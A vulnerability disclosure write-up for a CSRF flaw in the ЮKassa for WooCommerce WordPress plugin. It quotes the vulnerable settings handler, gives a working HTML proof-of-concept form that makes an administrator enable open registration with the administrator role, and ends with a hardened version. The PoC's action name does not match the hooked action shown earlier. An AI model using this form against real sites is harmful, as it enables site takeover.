The ЮKassa для WooCommerce plugin is a WordPress shop plugin that supports Russian payments via Yandex.
In the file yookassa/admin/yookassaadmin.php, line 58 reads add_action('wp_ajax_yookassa_save_settings', array($this, 'save_settings'));,
which hooks the save_settings function onto the wp_ajax_yookassa_save_settings action.
Let's look at the save_settings function at lines 563-604:
public function save_settings()
{
    header('Content-Type: application/json');
    if (!is_ajax()) {
        echo json_encode(array('status' => 'error', 'error' => 'Unknown', 'code' => 'unknown'));
        wp_die();
    }
    if ($options = explode(',', wp_unslash($_POST['page_options']))) {
        $user_language_old = get_user_locale();
        // Save options
        array_map(function ($option) {
            $option = trim($option);
            if (isset($_POST[$option])) {
                if (is_array($_POST[$option])) {
                    $value = $_POST[$option];
                    array_walk_recursive($value, function (&$item) {
                        $item = sanitize_textarea_field(wp_unslash(trim($item)));
                    });
                } else {
                    $value = sanitize_textarea_field(wp_unslash(trim($_POST[$option])));
                }
            } else {
                $value = null;
            }
            update_option($option, $value);
        }, $options);
        unset($GLOBALS['locale']);
        $user_language_new = get_user_locale();
        if ($user_language_old !== $user_language_new) {
            load_default_textdomain($user_language_new);
        }
    } else {
        echo json_encode(array('status' => 'error', 'error' => 'Unknown', 'code' => 'unknown'));
        wp_die();
    }
    echo json_encode(array('status' => 'success'));
    wp_die();
}
The handler never calls check_ajax_referer() (or any other nonce check) to verify that the AJAX request actually originated from the plugin's own settings page rather than from a third-party site. Because the option names themselves come from the page_options POST field and are passed straight to update_option(), a logged-in administrator who is lured onto an attacker-controlled page can be made to overwrite arbitrary WordPress options; this is a CSRF vulnerability.
The proof of concept is as follows:
<html>
<body>
<form action="http://exsample.com/wp-admin/admin-ajax.php?action=yandex_checkout_save_settings"
      method="POST" enctype="multipart/form-data">
    <input type="hidden" name="page_options" value="users_can_register,default_role">
    <input type="hidden" name="users_can_register" value="1">
    <input type="hidden" name="default_role" value="administrator">
    <input type="submit" name="Submit">
</form>
</body>
</html>
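For comparison, below is a hardened version of the same handler. This is an added illustration written for this write-up, not the plugin's own fix; the nonce action name yookassa_save_settings, the _ajax_nonce field name and the option names in $allowed_options are assumptions, and the real plugin would substitute its own settings keys.

```php
<?php
// Hardened save_settings() (added example, not the plugin's code).
// Fixes the CSRF in three layers: nonce, capability, option allow-list.
class YooKassaAdminHardened
{
    public function save_settings()
    {
        header('Content-Type: application/json');
        if (!wp_doing_ajax()) {
            wp_send_json_error(array('error' => 'Unknown', 'code' => 'unknown'));
        }

        // 1. Nonce: the settings page must have issued this token via
        //    wp_create_nonce('yookassa_save_settings') and sent it back as
        //    _ajax_nonce (names assumed). A cross-site form cannot obtain it,
        //    so check_ajax_referer() dies with -1 on a forged request.
        check_ajax_referer('yookassa_save_settings', '_ajax_nonce');

        // 2. Capability: only users allowed to manage options may save.
        if (!current_user_can('manage_options')) {
            wp_send_json_error(array('error' => 'Forbidden', 'code' => 'forbidden'), 403);
        }

        // 3. Allow-list: only the plugin's own options are writable, so core
        //    options such as default_role stay out of reach whatever
        //    page_options contains. Option names here are assumed.
        $allowed_options = array('yookassa_shop_id', 'yookassa_secret_key');
        $requested = array_map('trim', explode(',', wp_unslash($_POST['page_options'] ?? '')));

        foreach ($requested as $option) {
            if (!in_array($option, $allowed_options, true)) {
                continue; // anything not on the list is ignored
            }
            if (!isset($_POST[$option])) {
                update_option($option, null);
                continue;
            }
            $value = $_POST[$option];
            if (is_array($value)) {
                array_walk_recursive($value, function (&$item) {
                    $item = sanitize_textarea_field(wp_unslash(trim($item)));
                });
            } else {
                $value = sanitize_textarea_field(wp_unslash(trim($value)));
            }
            update_option($option, $value);
        }
        wp_send_json_success();
    }
}
```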
Disclosure: this vulnerability was reported to the original author right away and published only after the fix was released and with the author's consent.